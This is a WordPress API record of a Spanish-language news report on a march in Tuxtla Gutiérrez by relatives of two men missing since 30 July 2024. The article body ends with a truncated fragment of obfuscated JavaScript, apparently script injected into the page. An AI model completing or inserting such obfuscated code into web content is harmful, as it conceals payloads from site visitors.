{"id":17137,"date":"2024-08-09T01:35:21","date_gmt":"2024-08-09T01:35:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17137"},"modified":"2024-08-09T01:35:22","modified_gmt":"2024-08-09T01:35:22","slug":"pedimos-que-los-regresen-familiares-de-desaparecidos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17137","title":{"rendered":"&#8220;Pedimos que los regresen&#8221;, familiares de desaparecidos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167245445-1024x768.jpg\" alt=\"\" class=\"wp-image-17138\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167245445-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167245445-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167245445-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1723167245445.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jaime Ram\u00edrez<\/p>\n\n\n\n<p>8 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Familiares y amigos de Gabriel Hern\u00e1ndez Jim\u00e9nez, de 51 a\u00f1os y Ladislao de Jes\u00fas Velasco G\u00f3mez, de 25 a\u00f1os, ambos desaparecidos el pasado 30 de julio, realizaron una marcha para pedir a las autoridades redoblar esfuerzos para su localizaci\u00f3n.<\/p>\n\n\n\n<p>Este jueves por la ma\u00f1ana, este grupo, se concentr\u00f3 en la exfuente Mactumatz\u00e1, en donde con lonas, pancartas, pidieron ayuda a la poblaci\u00f3n en cualquier informaci\u00f3n que puedan aportar para dar con su paradero.<\/p>\n\n\n\n<p>Al menos unas cien personas participaron en la marcha que parti\u00f3 de este punto hacia el centro de la capital chiapaneca, para expresar el temor de no saber nada de los dos hombres desaparecidos.<\/p>\n\n\n\n<p>Frida Berenice Hern\u00e1ndez L\u00f3pez, hija de Gabriel explic\u00f3 que: \u201cNos hemos visto en la necesidad de realizar esta marcha, ya que, a nueve d\u00edas no tenemos ning\u00fan avance en el caso, no sabemos nada\u201d.<\/p>\n\n\n\n<p>Record\u00f3 que, el d\u00eda martes 30 de julio entre 10: 30 a 11 de la ma\u00f1ana los dos salieron de la casa de la abuela de Frida Berenice, y despu\u00e9s no se supo nada de ellos.<\/p>\n\n\n\n<p>\u201cEso es lo que se sabe del caso. Mi pap\u00e1 trabaja con un t\u00edo que se dedica a la construcci\u00f3n y mi cu\u00f1ado es comerciante, no hemos recibido ninguna llamada para pedir dinero o alg\u00fan mensaje&#8221;, expres\u00f3.<\/p>\n\n\n\n<p>En la marcha hicieron un llamado a las autoridades para redoblar esfuerzo en su localizaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jaime Ram\u00edrez 8 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Familiares y amigos de Gabriel Hern\u00e1ndez Jim\u00e9nez, de 51 a\u00f1os y Ladislao de Jes\u00fas Velasco G\u00f3mez, de 25 a\u00f1os, ambos desaparecidos el pasado 30 de julio, realizaron una marcha para pedir a las autoridades redoblar esfuerzos para su localizaci\u00f3n. Este jueves por la ma\u00f1ana, este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17138,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17137","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17137","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17137"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17137\/revisions"}],"predecessor-version":[{"id":17139,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17137\/revisions\/17139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17138"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17137"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17137"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17137"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}